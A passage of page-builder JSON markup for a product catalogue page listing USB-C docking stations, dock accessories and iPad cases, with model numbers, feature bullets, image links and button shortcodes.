adapter<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"057d62b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"cb49182\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6f3b6b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c43a02c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4105e5d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"45a2c58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"509b46a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5955103\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"52af851\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1e9b1c2\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5df361e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"5b30a76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6341b4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>USB-C Universal DV4K Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK180AP)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3ccec06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"133d383\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Universal Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK410AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17782db\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ba6eb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>2K Universal Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK120AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2528fe1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c82277a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7648653\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0030076_usb-c-universal-dv4k-docking-station-with-power_grande.jpg?v=1544442889\\\" alt=\\\"USB-C Universal DV4K Docking Station with Power\\\" width=\\\"234\\\" height=\\\"234\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e22637e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"142bf79\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0041279_usb-c-universal-docking-station-black.jpeg\\\" width=\\\"236\\\" height=\\\"236\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3eac094\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8261346\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/DOCK120USZ_ACP120US_50_MAIN-ALT2_grande.png?v=1549657702\\\" alt=\\\"2K Universal Docking Station\\\" width=\\\"238\\\" height=\\\"238\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58c2b8c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b8fee76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97b7a35\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) port support dual 4k Ultra HD monitors<\\/li><li>Power Delivery 2.0 provides up to 60W charging<\\/li><li>Thunderbolt\\u2122 3 compatible<\\/li><li>1 USB-C device port (USB 3.0 data only)<\\/li><li>1 Gigabit Ethernet port for secure, wire speed Ethernet access<\\/li><li>4 USB 3.0 ports for the latest peripherals (1 fast device-charging port)<\\/li><li>Includes 1-meter USB-C to C host cable (detachable)<\\/li><li>1 3.5mm combo Audio In\\/Out for mics, speakers, and earphones<\\/li><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) ports support dual 4K Ultra HD monitors<\\/li><li>Ergonomic wedge design for comfortable typing<\\/li><li>Integrated lock slot accommodates industry-standard security locks<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5e0b083\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"079e079\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>1 Gigabit Ethernet Port for wired access at ultra-fast speeds<\\/li><li>Ergonomic wedge design for comfortable typing<\\/li><li>Integrated lock slot accommodates standard security locks to safeguard equipment<\\/li><li>Universal compatibility with popular laptop and PC tablet brands and operating systems<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e5dec57\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7263a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>1 Audio In\\/Out port for mics, speakers and earphones<\\/li><li>1 DVI-I and 1 HDMI port supports dual monitors (up to 2048 x 1152 x 60 fps)<\\/li><li>1 Gigabit Ethernet port for wired access at ultra-fast speeds<\\/li><li>3 USB 3.0 SuperSpeed ports for the latest peripherals<\\/li><li>1 USB 3.0 powered port for fast device charging<\\/li><li>Integrated Lock Slot accommodates security locks to safeguard equipment<\\/li><li>Universal compatibility with popular brands and operating systems<\\/li><li>1 DisplayPort port supports a single 2K monitor (up to 2560 x 1600 x 30 fps)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9047438\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9064b56\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3a7aa27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bf24fa2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c4ea1e8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f009791\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"789ec09\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da4ffea\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"280bef3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c1f4b06\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"14ef8dc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"60548a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b553fd8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>VersaLink Universal Dual Video Travel Dock<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK110AP)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"531cd10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a984a69\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C DisplayPort\\u2122 Alt-Mode Travel Dock<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK411)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"929416d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4b4a72e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Alt-Mode Travel Dock w\\/ PD<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK412AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aad7e09\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"e8e16dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"933977a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/dock110usz_grande.jpg?v=1553684661\\\" alt=\\\"VersaLink Universal Dual Video Travel Dock\\\" width=\\\"259\\\" height=\\\"180\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9b8f07c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4e11288\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0027522_usb-c-displayport-alt-mode-travel-dock_1024x1024.png?v=1546599971\\\" width=\\\"181\\\" height=\\\"181\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ce38b83\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b5d41f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0050999_usb-c-alt-mode-travel-dock-w-pd-black_150.png\\\" alt=\\\"Picture of USB-C Alt-Mode Travel Dock w\\/ PD (Black)\\\" width=\\\"187\\\" height=\\\"187\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e209b35\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c7ea6f3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b59de72\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>VGA video port with 2048 x 1152 at 60 FPS resolution. HDMI video port with 2560 x 1440 at 50 FPS resolution. Gigabit Ethernet port for secure, wire speed Ethernet access. 2 USB SuperSpeed 3.0 ports for mice, flash drives, external hard drives and card readers.<\\/li><li>Integrated USB power cable connects to laptops, 2-in-1s and Microsoft Surface.<\\/li><li>Compact, smartphone-size dock weighs less than 5.5 ounces for easy portability<\\/li><li>Mac or PC compatible<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cf4acb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed7cdb2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Host-powered 90 mm tethered USB Type-C DisplayPort\\u2122 Alt-Mode (compatible with Thunderbolt\\u2122 3) host connection<\\/li><li>VGA up to 2048 x 1152 60Hz or HDMI2.0 up to 4096 x 2160 30Hz 24 bpp monitor connection<\\/li><li>1 USB 3.1 Gen 1 5Gbps (USB 3.0) Type-A port<\\/li><li>1 Gigabit Ethernet port<\\/li><li>HDMI includes 6 (5.1) channel audio<\\/li><li>Universal compatibility with popular Windows\\u00ae and macOS\\u2122 platforms<\\/li><li>Compact size that\\u2019s ideal for travel<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"af63771\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a6089bc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>mDP (4096 x 2160 p30 max)<\\/li><li>HDMI (4096 x 2160 p30 max)<\\/li><li>VGA (1920 x 1200)<\\/li><li>USB-C upstream cable (Laptop charging capable by PD pass through)<\\/li><li>2 x USB 3.1 Gen 1 type A downstream port<\\/li><li>1 x USB-C PD pass through (up to 60W) port with USB 3.1 Gen 1 downstream data support<\\/li><li>Gigabit Ethernet; Lock Slot<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6bd3110\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e6c4a3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1f4a7f2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"edce3a2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6c36b73\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f56d76e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e61842f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"99db6fd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"aa18c94\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"adb6db3\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"490dda7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1b4a251\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"173a4c8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Dock Accessories\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#0c0c0c\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17016d0\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9c15a98\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4ed087c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>USB-C to USB-A Cable<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACC1104GLX)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0932912\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8825bbc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>3-Pin 3-Way Hydra DC Power Cable<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACC1009USX)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ce75109\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5870ac3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Multiplexer Adapter<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACA46USZ)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4969a2c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b576756\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Alt-Mode Travel Dock w\\/ PD<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACA42USZ)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"19c81a5\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"ccebe66\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b656cbc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0053546_usb-cf-to-usb-30-am-cable.jpeg\\\" width=\\\"188\\\" height=\\\"188\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1efc850\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f549af5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0030033_3-pin-3-way-hydra-dc-power-cable.png\\\" width=\\\"187\\\" height=\\\"187\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c69d965\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"42471ae\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/ACA47GLZ_MAIN1_grande.png?v=1564601685\\\" alt=\\\"USB-C Multiplexer Adapter\\\" width=\\\"189\\\" height=\\\"189\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"aa37978\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"15b0138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/ACA42USZ_grande.jpg?v=1553683594\\\" alt=\\\"USB-C\\u2122 Demultiplexer\\\" width=\\\"194\\\" height=\\\"194\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5635ad5\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"bac619d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1f7ee4f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>USB Type-C female to USB 3.0 Type-A cable<\\/li><li>10cm long with tether<\\/li><li>Transfers data at rates up to 5 Gbps<\\/li><li>Compatible with Targus DOCK180USZ<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd75d2d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"bcabecd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Powers up to 1 large and 1 small device simultaneously<\\/li><li>Supports three connectors for multi-user and multi-device environments<\\/li><li>Self-locking collars ensure tips and power cable stay in place<\\/li><li>Uses existing Targus power cable and power tips from your powered dock (not included)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30e0068\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c4be429\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Supports USB-C laptops<\\/li><li>Works with Targus docks DOCK171USZ, DOCK177USZ, ACP77USZ and ACP71USZ<\\/li><li>Compact size for easy carrying<\\/li><li>Provides up to 85W of power with PD 2.0 and charges USB-C devices that accept charging via the USB-C port<\\/li><li>5 different charge profiles to ensure compatibility<\\/li><li>Includes USB-A, 2-pin DC Power, and 3-pin DC power ports; outputs USB-C<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3c23edb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ea8be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>1 USB-C\\/F port<\\/li><li>Enables support for legacy host devices<\\/li><li>Uses universal 3-pin power tip support<\\/li><li>For use with DOCK 180<\\/li><li>Supports power delivery charging up to 60W<\\/li><li>Supports USB 3.0 data transfer up 5 Gbps<\\/li><li>1 USB 3.0 Type A\\/M cable<\\/li><li>1 Targus 3 pin DC power cable (with tips for various laptop models)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"72a48df\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"adce2ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d0ec8ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ae9eaf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f4d772a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4e92ea9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5e24acf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c539844\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0ce0714\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"75cb4ec\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7bb65b8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4d7d888\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5aab643\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9405cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7d72c96\",\"elType\":\"widget\",\"settings\":{\"title\":\"Tablet Cases\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#0c0c0c\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ed426c2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"092906a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2d78b2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu\\u00ae Multi-Gen for 9.7\\\" IPad Pro, iPad Air 1, And 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ634GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"93dca52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ab79003\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>3D Protection<\\/strong><strong>\\u2122 <\\/strong><strong style=\\\"font-size: 1.25rem;\\\">Multi-Gen for <\\/strong><strong style=\\\"font-size: 1.25rem;\\\">9.7 <\\/strong><strong style=\\\"font-size: 1.25rem;\\\">iPad Pro, iPad Air 1, and 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ635GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6f08dfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"516eeda\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New Pro-Tek Rotating iPad 9.7\\\" 2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73711GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"98a279c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b3fdbec\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"36a5239\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/THZ634GL_FRONT_grande.png?v=1549412474\\\" alt=\\\"Black VersaVu\\u00ae Classic Case (Black) for iPad\\u00ae (2017\\/2018) (THZ634GL) - Front\\\" width=\\\"195\\\" height=\\\"195\\\" 